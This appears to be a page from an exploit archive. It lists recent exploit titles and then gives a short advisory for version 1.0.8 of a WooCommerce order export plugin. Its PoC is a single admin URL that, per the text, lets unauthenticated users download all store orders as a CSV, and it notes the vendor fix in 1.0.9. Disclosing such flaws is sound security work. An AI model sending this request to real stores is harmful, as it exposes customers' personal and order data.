235761b103
12 new exploits OpenSSL ASN.1<= 0.9.6j 0.9.7b - Brute Forcer for Parsing Bugs OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs ZineBasic 1.1 - Arbitrary File Disclosure SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities MyBB 1.8.6 - SQL Injection Kajona 4.7 - Cross-Site Scripting / Directory Traversal Docker Daemon - Privilege Escalation (Metasploit) SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow
23 lines
No EOL
760 B
Text
Executable file
23 lines
No EOL
760 B
Text
Executable file
# Exploit Title: WordPress Plugin Order Export Import for WooCommerce
|
|
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
|
|
# Version: 1.0.8
|
|
# Date: 19th 2016
|
|
# Exploit Author: contact ([a]) david-peltier ([d]) fr
|
|
# Vendor Homepage: xadapter.com
|
|
# Version: 1.0.8
|
|
# Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016
|
|
|
|
|
|
### SUMMARY
|
|
|
|
WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
|
|
This attacks allows an attacker to export all order without being authenticated
|
|
|
|
### POC
|
|
|
|
http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
|
|
A .CSV with all orders will be downloaded
|
|
|
|
### FIX
|
|
|
|
The vendor fix this issue in 1.0.9 |